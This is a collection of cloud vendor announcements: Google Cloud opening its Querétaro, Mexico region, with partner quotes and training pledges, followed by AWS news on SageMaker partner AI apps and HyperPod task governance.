Google Cloud is delighted to announce the opening of our 41st cloud region in Querétaro, Mexico. This marks our third cloud region in Latin America, joining Santiago, Chile, and São Paulo, Brazil. From Querétaro, we’ll provide fast, reliable cloud services to businesses and public sector organizations throughout Mexico and beyond. This new region offers low latency, high performance, and local data residency, empowering organizations to innovate and accelerate digital transformation initiatives.
Helping organizations in Mexico thrive in the cloud
Google Cloud regions are major investments to bring best-in-class infrastructure, cloud and AI technologies closer to customers. Enterprises, startups, and public sector organizations can leverage Google Cloud’s infrastructure economy of scale and global network to deliver applications and digital services to their end users.
With this new region in Querétaro, Mexico, Google Cloud customers enjoy:
Speed: Serve your end users with fast, low-latency experiences, and transfer large amounts of data between networks easily across Google’s global network.
Security: Keep your organizations’ and customers’ data secure and compliant, including meeting the requirements of CNBV contractual frameworks, and maintain local data residency.
Capacity: Scale to meet growing user and business needs.
Sustainability: Reduce the carbon footprint of your IT environment and help meet sustainability targets.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3edc867b96d0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Google Cloud customers are eager to benefit from the new possibilities that this cloud region offers:
“At Prosa, we have been undergoing a transformation process for the past three years that involves adopting technology and developing digital skills within our teams. The partnership with Google has been key to carrying out projects, evolving towards digital business models, enabling the ecosystem, promoting the API-ification of services, and improving data analysis. This alliance is only deepened with the launch of the new Google Cloud region, which will facilitate the integration of participants into the payment ecosystem in a secure and highly available manner, improving the customer experience and delivering value more quickly and agilely,” said Salvador Espinosa, CEO of Prosa, a payment technology company that processed more than 10 million transactions in 2023.
Building a new Google Cloud region in Querétaro, Mexico is welcomed by the Mexican public sector.
“The new Google cloud region in Mexico will be key to build a digital government accountable to citizens, deepening our path to digital transformation. Since 2018, the Auditoria Superior de la Federación (ASF) has pioneered digital transformation in Mexico, promoting innovation and the responsible use of technology, while using advanced technologies like Google Cloud’s Vertex AI, among other proprietary tools, to enhance data analysis, automate processes, and improve collaboration. This enables more accurate decision-making, optimized oversight of public spending, increased inspection coverage, and transparent use of resources. Thanks to the cloud, we see a future where technology is a strategic ally to execute efficient, agile and exhaustive digital audits, detect irregularities early, and strengthen accountability. ASF’s focus on transparency and efficiency aligns with President Claudia Sheinbaum’s public innovation policy.” – Emilio Barriga Delgado, Special Auditor of Federalized Expenditure, Auditoria Superior de la Federación
The new cloud region also opens new opportunities for our global ecosystem of over 100,000 incredibly diverse partners.
“For Amarello and our customers, the availability of a new region in Mexico demonstrates the great growth of Google Cloud and its commitment to Mexico. It’s also a great milestone for the country, putting us on par with other economies. This will create jobs that will speed up our clients’ adoption of strategic projects and latency-sensitive technological services such as financial services or mission-critical operations. At the same time, the new region will enable projects that require information to be maintained within the national territory, now on the most innovative and secure public cloud.” – Mauricio Sánchez Valderrama, managing partner, Amarello Tecnologías de Información
And for global companies looking to tap into the Mexican market:
As networks shift to a cloud-first approach, and hybrid work enables work from anywhere, businesses in the Mexico region can now securely accelerate innovation, boost efficiency, and enhance customer experiences with Palo Alto Networks AI-powered solutions, like Prisma SASE, built in the cloud to secure the cloud at scale. The powerful collaboration between Google Cloud and Palo Alto Networks reinforces our commitment to security and innovation so organizations can confidently embrace the AI-driven future, knowing their users, data, and applications are protected from evolving threats.” Anupam Upadhyaya, Vice President, Product Management, Palo Alto Networks
Delivering on our commitment to Latin America
In 2022, we announced a five-year, $1.2 billion commitment to Latin America, focusing on four key areas: digital infrastructure, digital skills, entrepreneurship, and inclusive, sustainable communities.
We’re equally committed to creating new career opportunities for people in Mexico and Latin America: We’re working with over 550 universities across Latin America to offer a robust and continuously updated portfolio of learning resources so students can seize the opportunities created by new digital technologies like AI and the cloud. As a result, we’ve already granted more than 14,000 digital skill badges to students and individual developers in Mexico over the last 24 months.
Another example of our commitment is the “Súbete a la nube” program that we created in partnership with the Inter-American Development Bank (IDB), with a focus on women and the southern region of the country. To date, 12,500 people have registered for essential digital skills training in cloud computing through the program.
Today, we’re also announcing a commitment to train 1 million Mexicans in AI and cloud technologies over the coming years. Google Cloud will continue to skill Mexico’s local talent with a variety of no-cost training programs for students, developers and customers. Some of the ongoing training programs will include no-cost, localized courses available through YouTube, credentials through the Google Cloud Skills Boost platform, community support by Google Developer Groups, and scholarships for the Google Career Certificates that help prepare learners for high-growth, in-demand jobs in fields like cybersecurity and data analytics, so the cloud can truly democratize innovation and technology.
This new Google Cloud region is also a step towards providing generative AI products and services to Latin American customers. Cloud computing will increasingly be a key gateway towards the development and usage of AI, helping organizations compete and innovate at global scale.
Google Cloud is dedicated to being the partner of choice for customers undergoing digital transformation. We’re focused on providing sustainable, low-carbon options for running applications and infrastructure. Since 2017, we’ve matched 100% of our global annual electricity use with renewable energy. We’re aiming even higher with our 2030 goal: operating on 24/7 carbon-free energy across every electricity grid where we operate, including Mexico.
We’re incredibly excited to open the Querétaro, Mexico region, bringing low-latency, reliable cloud services to Mexico and Latin America, so organizations can take advantage of all that the cloud has to offer. Stay tuned for even more Google Cloud regions coming in 2025 (and beyond), and click here to learn more about Google Cloud’s global infrastructure.
Today Amazon Web Services, Inc. (AWS) announced the general availability of Amazon SageMaker partner AI apps, a new capability that enables customers to easily discover, deploy, and use best-in-class machine learning (ML) and generative AI (GenAI) development applications from leading app providers privately and securely, all without leaving Amazon SageMaker AI so they can develop performant AI models faster.
Until today, integrating purpose-built GenAI and ML development applications that provide specialized capabilities for a variety of model development tasks, required a considerable amount of effort. Beyond the need to invest time and effort in due diligence to evaluate existing offerings, customers had to perform undifferentiated heavy lifting in deploying, managing, upgrading and scaling these applications. Furthermore, to adhere to rigorous security and compliance protocols, organizations need their data to stay within the confines of their security boundaries without needing to move their data elsewhere, for example, to a Software as a Service (SaaS) application. Finally, the resulting developer experience is often fragmented, with developers having to switch back and forth between multiple disjointed interfaces. With SageMaker partner AI apps you can quickly subscribe to a partner solution and seamlessly integrate the app with your SageMaker development environment. SageMaker partner AI apps are fully managed and run privately and securely in your SageMaker environment reducing the risk of data and model exfiltration.
At launch, you will be able to boost your team’s productivity and reduce time to market by enabling: Comet, to track, visualize, and manage experiments for AI model development; Deepchecks, to evaluate quality and compliance for AI models; Fiddler, to validate, monitor, analyze, and improve AI models in production; and, Lakera, to protect AI applications from security threats such as prompt attacks, data loss and inappropriate content.
SageMaker partner AI apps is available in all currently supported regions except Gov Cloud. To learn more please visit SageMaker partner AI app’s developer guide.
Amazon SageMaker HyperPod now provides you with centralized governance across all generative AI development tasks, such as training and inference. You have full visibility and control over compute resource allocation, ensuring the most critical tasks are prioritized and maximizing compute resource utilization, reducing model development costs by up to 40%.
With HyperPod task governance, administrators can more easily define priorities for different tasks and set up limits for how many compute resources each team can use. At any given time, administrators can also monitor and audit the tasks that are running or waiting for compute resources through a visual dashboard. When data scientists create their tasks, HyperPod automatically runs them, adhering to the defined compute resource limits and priorities. For example, when training for a high-priority model needs to be completed as soon as possible but all compute resources are in use, HyperPod frees up resources from lower-priority tasks to support the training. HyperPod pauses the low-priority task, saves the checkpoint, and reallocates the freed-up compute resources. The preempted low-priority task will resume from the last saved checkpoint as resources become available again. And when a team is not fully using the resource limits the administrator has set up, HyperPod use those idle resources to accelerate another team’s tasks. Additionally, HyperPod is now integrated with Amazon SageMaker Studio, bringing task governance and other HyperPod capabilities into the Studio environment. Data scientists can now seamlessly interact with HyperPod clusters directly from Studio, allowing them to develop, submit, and monitor machine learning (ML) jobs on powerful accelerator-backed clusters.
Task governance for HyperPod is available in all AWS Regions where HyperPod is available: US East (N. Virginia), US West (N. California), US West (Oregon), Asia Pacific (Mumbai), Asia Pacific (Singapore), Asia Pacific (Sydney), and Asia Pacific (Tokyo), Europe (Frankfurt), Europe (Ireland), Europe (London), Europe (Stockholm), and South America (São Paulo).